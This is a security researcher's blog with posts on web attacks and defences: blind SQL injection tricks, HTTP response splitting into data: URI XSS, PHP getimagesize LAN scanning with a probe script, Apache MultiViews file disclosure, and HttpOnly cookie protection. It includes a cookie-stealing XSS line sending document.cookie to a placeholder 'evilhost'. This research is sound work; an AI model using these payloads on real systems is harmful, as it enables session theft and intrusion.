
Security Thoughts


Monday, December 03, 2007, 21:21

ExploitMe Tools - A Little Warning

A few days ago two interesting new tools, XSSMe and SQLiMe, were released and donated to the security community by Security Compass.
From their site:

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS) vulnerabilities.
What is Exploit-Me?
A suite of Firefox web application security testing tools.
Exploit-Me tools are designed to be lightweight and easy to use.
Instead of using proxy tools like many web application testing tools, Exploit-Me integrates directly
with Firefox.

OK, so much for the official story.

The problem is that the XSSMe attack patterns use www.securitycompass.com as an external source:

<SCRIPT a=">'>" SRC="">

and this should not happen; at the very least, XSSMe should ask the user to switch to a custom server.
Why? Because if you're doing some ethical hacking activity using XSSMe for automated testing, whenever the target host has an XSS, the Security Compass web server gets a request like the following:

GET /xss.js HTTP/1.1
User-Agent: Firefox/
Connection: keep-alive

Do you see? The Referer header is a great resource for statistics, and if you're doing the testing under an NDA you're almost screwed.

So, in order to resolve this issue, I exported the XSS attacks to XML, replaced the external server with my local one, deleted every pattern from the option dialog and re-imported the modified xss.xml.
Even though I really think this was just an oversight, if anyone intends to use XSSMe, fix it yourself, or use it at your own risk!
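The find-and-replace step can be scripted; here's a minimal sketch (the file names and the local address are assumptions, adapt them to your own export):

```python
from pathlib import Path

def localize_patterns(src, dst, external="www.securitycompass.com",
                      local="127.0.0.1"):
    """Rewrite every occurrence of the external host in the exported
    attack file so the payloads point at a server you control."""
    data = Path(src).read_text(encoding="utf-8")
    Path(dst).write_text(data.replace(external, local), encoding="utf-8")

# e.g. localize_patterns("xss.xml", "xss-local.xml")
```

After re-importing the rewritten file, any hit lands in your own logs instead of a third party's.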

Q: Did you report this issue to Security Compass?
A: Yes. They added a known-issues link with a description of the problem.



Monday, November 05, 2007, 22:54

Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)

Today my colleague Giorgio Fedon of Minded Security told me about an idea for saving bandwidth while exploiting blind SQL injection.
His question was:

"When a pentester is trying to get the content of a DB by exploiting a blind injection how can s/he get the content-length header without effectively getting all
the response body, so that s/he can save time and bandwidth?"

My answer was: "use HEAD! (in both senses :)"
It turned out that the RFC doesn't guarantee it: a server is not required to include a Content-Length with a HEAD response.
In fact, Apache doesn't satisfy a HEAD request with a Content-Length header in the response.

HEAD /index.php HTTP/1.1
Accept: */*

HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:00:07 GMT
Server: Apache
Content-Type: text/html

See? No Content-Length in the response, even though my localhost home page is 90 bytes long (the RFC allows the header to be omitted here).
Let's try with the Range header:

GET /index.php HTTP/1.1
Accept: */*
Range: bytes=-1

HTTP/1.1 206 Partial Content
Date: Mon, 05 Nov 2007 21:03:15 GMT
Server: Apache
Content-Range: bytes 89-89/90
Content-Length: 1
Content-Type: text/html

Ahhhh, so the Range header in a request will be honored without sending me the whole body, and the Content-Range header shows me how big the body itself is.

Unfortunately, not all web servers act the same.
IIS 6.0 doesn't follow the HTTP 1.1 RFC here and simply sends the whole body in response to ranged GET or POST requests.
But... yes, there is a but.
HEAD requests are fulfilled with the right Content-Length:

HEAD /search.aspx HTTP/1.1
Accept: */*
Content-Length: 22


HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4790
Content-Type: text/html
Expires: Mon, 05 Nov 2007 21:14:00 GMT
Cache-control: private

This means we get the length of the response body even when there's no body in the response.

How can this information be used?
To improve blind SQL injection tools.

Blind SQL injection tools often use the differences in response bodies to understand whether the injected condition evaluated to true or false.
Using Content-Length or Content-Range instead could improve performance a lot.
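As a sketch, a tool could probe like this (host and path are placeholders; per the captures above, the ranged GET works on Apache and the HEAD variant on IIS 6.0):

```python
import http.client
import re

def content_range_total(value):
    """Parse the total size out of a Content-Range header,
    e.g. 'bytes 89-89/90' -> 90."""
    m = re.match(r"bytes\s+\d+-\d+/(\d+)", value)
    return int(m.group(1)) if m else None

def response_length(host, path, use_head=False):
    """Get the length of a response without downloading its body:
    either a HEAD request, or a GET asking only for the last byte."""
    conn = http.client.HTTPConnection(host)
    if use_head:
        conn.request("HEAD", path)
        cl = conn.getresponse().getheader("Content-Length")
        return int(cl) if cl else None
    conn.request("GET", path, headers={"Range": "bytes=-1"})
    resp = conn.getresponse()
    resp.read()  # at most one byte travels over the wire
    cr = resp.getheader("Content-Range")
    return content_range_total(cr) if cr else None
```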

The following lookup table summarizes, per server, which method returns the length without the body:

Server    HEAD (Content-Length)    Range (Content-Range)
Apache    no                       yes
IIS 6.0   yes                      no
We (Giorgio and I) hope some readers will provide information about other web servers.



Thursday, November 01, 2007, 23:29

HTTP Response Splitting and Data: URI scheme in Firefox

After having read Pdp's point of view about the data: URI scheme in Firefox, here's another reason why Mozilla developers should stop letting data: URIs inherit the context of the initiating parent site.

It is known that the Meta Http-equiv='Refresh' tag can be exploited to inject JavaScript using data:.
It's also known that Refresh is an HTTP header and that it has security implications, as clearly explained by Amit Klein.
Putting all of this together, HTTP Response Splitting can be used to inject a Refresh: header and directly XSS the redirecting site.
Let's suppose there's a redirection script which acts like the following:

GET /redirect.jsp?redir=http:// spamsite. com HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 01 Nov 2007 21:40:23 GMT
Location: http:// spamsite. com
Transfer-Encoding: chunked
Content-Type: text/html

If this script also suffers from HTTP Response Splitting, an attacker can easily inject a Refresh: header with a data: URI.

GET /redirect.jsp?redir=data:blah%0aRefresh:+0%3b+url%3ddata:text/html%3b,<script>js</script> HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 01 Nov 2007 21:40:23 GMT
Location: data:blah
Refresh: 0; url=data:text/html;,<script>js</script>
Transfer-Encoding: chunked
Content-Type: text/html

Firefox will happily execute it in the context of the redirector.
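To see why, here's a minimal sketch that decodes the injected parameter the way the query string is decoded before being echoed into the Location header (payload taken from the request above):

```python
from urllib.parse import unquote_plus

payload = ("data:blah%0aRefresh:+0%3b+url%3d"
           "data:text/html%3b,<script>js</script>")
# Decoding turns %0a into a raw newline, so the echoed value
# spans two header lines instead of one.
lines = unquote_plus(payload).split("\n")
print(lines[0])  # ends up in the Location header: data:blah
print(lines[1])  # becomes a brand new Refresh header
```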



Friday, October 05, 2007, 17:47

Optimizing the number of requests in blind SQL injection

Blind injection is often treated as an on/off binary search performed with the bisection algorithm.
When the bisection algorithm is applied, the complexity is O(log2 n), where n for the extended ASCII character set is 255.
So for each character at a given position 'p' the number of requests will be:

log2 255 ≈ 8 (or exactly 7 if the search is restricted to 7-bit ASCII, n = 128)

So if the length of the information to be retrieved is 8 characters,
the total number of requests to be sent is

8 * log2 128 = 56

Let's suppose now there is the following situation:

http:// vi.ctim/page.jsp?id=1

where page.jsp is a script which dynamically loads content using the SQL query:

qry = "Select content from pages where id=" + Request.value("id");

Let's suppose the rest of the application gives no clue about SQL errors, nor any other trick to force the web application to display the information we want.
This is a classical blind SQL injection case.

But what happens if changing the 'id' value results in different pages being displayed?

The attacker can use the different responses to map the results of an injected conditional SQL statement.

That is: let's suppose there are more than 255 values for the 'id' parameter

"http:// vi.ctim/page.jsp?id=1"
"http:// vi.ctim/page.jsp?id=2"

then let's map every unique snippet of text content to its id value.
Then, by injecting (in pseudo code):

For (pos = 1; pos <= LEN(@@version); pos++){
  idval = "(CASE substr(@@version," + pos + ",1)
     when char(1) then 1
     when char(2) then 2
     when char(3) then 3
     when char(4) then 4
     when char(5) then 5
     ...
     end )"
  get the response for page.jsp?id=idval
}
the attacker will have to send only

LEN(@@version)

requests, because for every request the application will return the page mapped to the character value.

Now, this is the best case: for every character value there exists a single id value.

There could instead be a number of distinct id values which is less than 255
(or less than the number of printable chars, for non-binary information).

Let's suppose there exist only 4 unique id values corresponding to 4 unique responses.
Then the injected query will be (in pseudo code):


if(res>191 and res<256)
  then 1
else if(res>127 and res<192)
  then 2
else if(res>63 and res<128)
  then 3
else
  then 4

For each result, the set of values we are analysing will be 1/4 of the previous set.

This algorithm is O(log4 255), which corresponds to

LEN * log4 255 ≈ LEN * 4

requests to be sent.
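A minimal simulation of this generalized search (the oracle below stands in for the k distinct page responses; in a real tool each oracle call would be one HTTP request):

```python
import math

def extract_char(oracle, k=4, lo=0, hi=256):
    """Narrow down one character value in [lo, hi) with a k-ary
    search: each oracle call reports which of the k mapped pages
    came back, i.e. which bucket the character falls in."""
    requests = 0
    while hi - lo > 1:
        step = math.ceil((hi - lo) / k)
        bucket = oracle(lo, step)   # one HTTP request in practice
        requests += 1
        lo = lo + bucket * step
        hi = min(lo + step, hi)
    return lo, requests

# Simulated oracle: returns the bucket index the injected CASE
# expression would map the secret character into.
secret = ord("A")
value, n = extract_char(lambda lo, step: min((secret - lo) // step, 3))
print(chr(value), n)  # 'A' recovered in ceil(log4 256) = 4 requests
```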

The worst case falls back to the on/off bisection algorithm already described in several papers.

I don't have time to implement it now, but I hope to see some tool adopt this (maybe) new approach :)



Wednesday, August 29, 2007, 17:24

Scanning an internal LAN with PHP remote file opening.

Even if some websites are still vulnerable to remote file inclusion (RFI), this is becoming a fairly rare scenario.
Much more often, though, some of the PHP functions that allow http or ftp protocol wrappers are exposed to user control.
A perfect example of this technique is a fully user-controlled getimagesize() call with allow_url_fopen enabled.
No RFI, no data returned; at first glance it could only be used for DoS.


Obviously there's no RFI, and until yesterday probably nobody would care to check, inspect or exploit it. This article explains that some kinds of attack can still be accomplished:

LAN scanning and drive-by pharming with error matching or time analysis.

If PHP's error display is set to On, a simple request like the following:

will display:

Warning: getimagesize( failed to open stream:
Connection refused in...

This means it's a closed port.

An open port, on the other hand, will produce:

Warning: getimagesize( failed to open stream:
HTTP request failed!...

The ftp:// protocol wrapper could obviously be used, too.

If no error is displayed, timing attacks can be used instead.

In fact, here's the timing result when a port is closed:

real 0m0.057s
user 0m0.032s
sys 0m0.020s

Or when a port is open:

real 0m5.095s
user 0m0.032s
sys 0m0.020s

So, what can be done?

If the right conditions are satisfied:
1. Drive-by Pharming
2. Bruteforcing routers
3. Full LAN scan

Last, Ascii wrote a nice PHP script for LAN scanning.
You can find it here...
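If you want to experiment with the timing side yourself, a rough client sketch follows (the ?img= parameter and the target endpoint are hypothetical; the threshold depends on the network):

```python
import time
import urllib.parse
import urllib.request

def probe_port(target_script, inner_host, port, timeout=10):
    """Ask a vulnerable script (hypothetical ?img= parameter that
    ends up in getimagesize()) to connect to an internal host:port,
    and measure how long the response takes."""
    inner = f"http://{inner_host}:{port}/a.png"
    url = target_script + "?img=" + urllib.parse.quote(inner, safe="")
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except OSError:
        pass
    return time.monotonic() - start

def classify(elapsed, threshold=1.0):
    """Closed ports are refused quickly; open or filtered ones keep
    the back-end HTTP request hanging, as in the timings above."""
    return "open/filtered" if elapsed >= threshold else "closed"
```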

Ah... did I mention that PHP's remote file support handles HTTP Basic Authentication? :)

As usual, the next move is up to you.



Friday, August 17, 2007, 13:13

Preventing XSS with Data Binding

For almost a couple of months now I've been researching and studying how to apply the concept of Prepared Statements, used in SQL, to HTML in order to prevent XSS.
I asked Pdp, RSnake, Jeremiah Grossman, Kuza55, Romain Gaucher and some other researchers to have a look at it and give me some feedback.

The raw Proof of Concept could be found here.

Here's some of the (technical) content of the mail I sent them:


The idea is to use something like SQL prepared statements, applied to HTML, to prevent XSS the same way prepared statements prevent SQL injection.

In fact, server-side filtering is often home-made, and it doesn't cover everything browsers are able to parse, nor the well-known proprietary interpretations of HTML.

How could this be accomplished?
By separating trusted HTML from untrusted data.
My idea is that semantic separation could be a good way to let browsers do the validation/sanitization.

An example of semantic separation is the deprecated <plaintext> tag, because browsers parse everything after it as plain text; there is no closing </plaintext> tag.

Even though a more complex model could be proposed to vendors as a standard, from the client-side point of view it should be quite easy to implement some JavaScript code which parses and validates user data before attaching it to the HTML.

A couple of examples follow:

Simple Text :

<bindtext id='someid'></bindtext>

with a body onload event, a JavaScript routine is then executed in order to:
1. get the text after the plaintext tag and parse it as an associative array: id => userdata
2. find all bindtext tags and call
   tag.appendChild(document.createTextNode(binding['id']));
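On the server side, the emission step might look like the following sketch (the JSON blob after the <plaintext> tag is my assumption about a possible wire format, not necessarily the PoC's actual one):

```python
import json

def render(trusted_template, bindings):
    """Emit the trusted markup first, then the untrusted user data
    after a <plaintext> tag: the browser never parses the data as
    HTML, and the onload script re-attaches it as text nodes."""
    return trusted_template + "\n<plaintext>\n" + json.dumps(bindings)

page = render("<html><body onload='bind()'>"
              "<bindtext id='someid'></bindtext></body></html>",
              {"someid": "<script>alert(1)</script>"})
```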


Although attributes are more complex, I think that by relying on data binding every attribute could be checked and sanitized in a preprocessing stage.

A simple href/src attribute check could be implemented by adding a new attribute named 'bindattr', like the following:

<a bindattr='href=ref|' > Click here </a>

and then using JavaScript to read the protocol as parsed internally by the browser, via HTMLAnchorElement:

function getProtocol(url){
  var a = document.createElement('A');
  a.href = url;
  return a.protocol;
}
Since the protocol is the one parsed by the client itself, the "real" protocol is returned, ready to be checked and validated on the client side.

These are, obviously, just examples of what could be done by taking advantage of data binding and a preprocessing stage; anyway, you can check every client/server side control I've implemented by looking at the source files linked on test.php.

I am planning to release a paper (as Minded Security) about this research in September.

Moreover, I think a community-based forum could be created, if the idea is interesting to enough people, in order to implement a 360-degree client-side validation engine.

Last, this would stop only about 80% of XSS (DOM-based XSS is on another level), but I think that if it were implemented at the browser code level, as a standard, it would be an interesting new methodology for XSS prevention.


I also added style preprocessing code and some ideas for preprocessing untrusted data when dealing with mixed HTML.

Even though I was planning to release a paper for Minded Security in early September, RSnake posted a blog entry, probably in order to start some early discussion before I could write a complete, exhaustive paper about this technique.
Well, the discussion started and it's already very interesting.
Kuza55 (a real browser hacker ;) found a way to take advantage of the custom charset feature to stop the plaintext markup from working and get the untrusted data parsed!
There are several workarounds for this, but I would like to use the most elegant and practical one :)
Update: I used three plaintext markups to fix the issue. It's not that elegant, but it should work.

Dean Brettle has already contributed an alternative solution using document.write in place of the plaintext markup.

Next blog entry will be about some more technical details and workarounds.

Last, I ask for a bit of patience until early September, when I'll release a more exhaustive paper, since the real goal of this approach is to write a proposal for a standard.

It seems there's no peace ... even when I'm on vacation. :)



Saturday, July 14, 2007, 17:26

Apache MultiViews, Accept headers and free listing

This is a small post about a way to easily find backup files on Apache web servers with the MultiViews option enabled.
I really don't know if this is a known attack technique, but IMO it should be implemented in every web scanner and added to the OWASP Testing Guide, Information Gathering section.

Let's start:

MultiViews is an Apache option which works according to the following rules:

if the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client
had asked for one of them by name. It then chooses the best match to the client's requirements.

How is the best match chosen by Apache?
It depends on the various Accept* headers in the client request.


Let's see how it works:

Let's suppose I just saved a backup copy of my index.php on a web server with the MultiViews option enabled.

If an attacker requests "index" without any extension:

GET /index HTTP/1.1
Host: myhost
Accept: */*

the web server will reply with:

HTTP/1.1 200 OK
Date: Sat, 14 Jul 2007 14:46:22 GMT
Server: Apache/2.0.55 (Ubuntu)
Content-Location: index.php
Vary: negotiate,accept
TCN: choice
Last-Modified: Sat, 14 Jul 2007 10:58:38 GMT
ETag: "8d15d-0-1c1d5380;498a0540"
Accept-Ranges: bytes
Content-Length: #ofBytes
Content-Type: text/html; charset=UTF-8

Now, notice the several interesting headers that show up in the server response:

Content-Location: index.php
Vary: negotiate,accept
TCN: choice

This means MultiViews is enabled on the / directory.

Now let's see what happens if we use an Accept: header with a nonexistent MIME type in the request:

GET /index HTTP/1.1
Host: myhost
Accept: application/whatever; q=1.0

the server will reply with:

HTTP/1.1 406 Not Acceptable
Date: Sat, 14 Jul 2007 14:51:29 GMT
Server: Apache/2.0.55 (Ubuntu)
Alternates: {"index.bak" 1 {type application/x-trash} {length 3}},
{"index.php" 1 {type application/x-httpd-php} {length 3}}
Vary: negotiate,accept
TCN: list
Content-Length: NNNN
Content-Type: text/html; charset=iso-8859-1

<title>406 Not Acceptable</title>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /index could not
be found on this server.</p>
Available variants:
<li><a href="index.php">index.php</a> , type text/html</li>
<li><a href="index.bak">index.bak</a> , type application/x-trash</li>

Aha! With a single request we get a listing of all the files!
And for free, as in free speech ;)

Well, OK, not really *all* the files, but every file with the same base name as the requested one and with an extension listed in the mime-types file.

This means that if index.whatever is on the server, it won't be listed.

Obviously, an attacker could request every known extension for index.*, but that would be a bit noisy, wouldn't it?
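A sketch of an automated probe (host and path are placeholders; the regex matches the Alternates format shown in the 406 response above):

```python
import http.client
import re

VARIANT = re.compile(r'\{"([^"]+)"')

def list_variants(host, path="/index"):
    """Request an extensionless resource with an unsatisfiable
    Accept header; on a MultiViews-enabled directory Apache
    replies 406 and leaks the variant names in Alternates."""
    conn = http.client.HTTPConnection(host)
    conn.request("GET", path,
                 headers={"Accept": "application/whatever; q=1.0"})
    alternates = conn.getresponse().getheader("Alternates") or ""
    return VARIANT.findall(alternates)
```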

As usual, I prefer to leave the discussion open rather than spell out everything I think, so feel free to leave a comment. Free as in free beer :)



Friday, May 18, 2007, 17:19

Owasp Conference and Flash Application Testing.

App Sec 2007 Owasp Conference was a great event.
I did a presentation about Flash Application Security.

It describes how Flash applications are not as secure as one might think: as with every technology, ActionScript has its own bad coding practices which can lead a Flash application to be abused in order to generate XSS, plus a new attack vector called Cross Site Flashing.

Download the slides in Pdf or in Swf :)

Note: as the slides are not always self-explanatory, I'll try to publish more comprehensive details in the next blog entries.

The Best is yet to come...
Stay Tuned.



Monday, May 07, 2007, 21:57

Interview with Rain Forest Puppy

A friend of mine, Antonio `S4tan` Parata, has interviewed Rain Forest Puppy.
For those who still don't know RFP: he is one of the fathers of web application security and the author of RFPolicy.
A great interview, well worth reading!



Wednesday, July 26, 2006, 18:08

HttpOnly and Firefox.

XSS vulnerabilities are often used to steal cookies.
Once the attacker uses XSS to get the cookies, there are several techniques to apply, such as Session Hijacking.
A classical example of collecting cookies via XSS is:

var img = new Image();
img.src = "http://evilhost/?c=" + document.cookie; // evilhost: attacker-controlled placeholder

These two lines of JS code force the browser to create an image and request it from the specified address.
If that address is controlled by a malicious user, he will obtain the victim's cookie without the victim's authorization.
To understand how dangerous this technique is, just think about sessions.

Some time ago, starting with IE 6 SP1, Microsoft implemented a new keyword to try to mitigate this problem.

How does it work?
If our web server sends a cookie with the HttpOnly attribute, like the following:

Set-Cookie: Session=12345; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly

IE sees it and blocks cookie access from JavaScript.
This way it's no longer possible to read the cookie via the 'document.cookie' JS statement.

Yes, there are ways to bypass HttpOnly, but it's really easy to block the TRACE method via configuration settings, so these attacks are easy to mitigate or stop entirely.

Just a little warning: we are talking exclusively about stopping cookie theft. XSS itself is far more dangerous.

Mozilla developers are stuck on this: they currently won't implement HttpOnly in Mozilla/Firefox.
Thanks to Ascii, with whom I had some discussion about blocking XSS a few days ago, I went deep into JavaScript paradigms and internals.

Mozilla developers are really great, because they implemented the W3C specification in a neat way.
They created a JS framework that is really simple and useful.
For our purpose, they implemented prototyping functions to allow web developers to define classes and objects easily and smartly.
Let's talk about __defineGetter__ and __defineSetter__ by applying them to cookies.


__defineGetter__ : defines a function (a callback) to be called every time the value of the property is read.

__defineSetter__ : defines a function (a callback) to be called every time a new value is assigned to the property.


HTMLDocument.prototype.__defineGetter__("cookie",function (){return null;});

will block every read of document.cookie from within JS.

For example:

HTMLDocument.prototype.__defineGetter__("cookie",function (){return "sorry";});

will make any read of document.cookie (e.g. alert(document.cookie)) yield "sorry" rather than the original cookie value; internally, though, Mozilla/Firefox keeps the real cookie value.

And what about __defineSetter__?
It could be used to mitigate Session Fixation or other client-side cookie tampering techniques.
That is, if we don't want the cookie to be tampered with from within JavaScript, we could use the following:

HTMLDocument.prototype.__defineSetter__("cookie",function (val){});

This approach alone, however, is not enough, as cookies can still be set from HTML by using:
<meta http-equiv="Set-Cookie" content="value=n;path=/">

Anyway, if we filter out "meta" tags in user input, this technique can block, or at least mitigate, cookie tampering via HTML.

Getters and setters could be used to block functions too; for example, think about XMLHttpRequest & co.
There is, of course, a little drawback: every access to the blocked variables and functions is denied from JavaScript.

Unfortunately, __defineGetter__ and __defineSetter__ aren't implemented in all browsers (read: MSIE). I long for a _real_ standard JS implementation across all browsers... :(



Wisec is brought to you by...

Wisec is written and maintained by Stefano Di Paola.

Wisec uses open standards, including XHTML, CSS2, and XML-RPC.

All Rights Reserved 2004
All hosted messages and metadata are owned by their respective authors.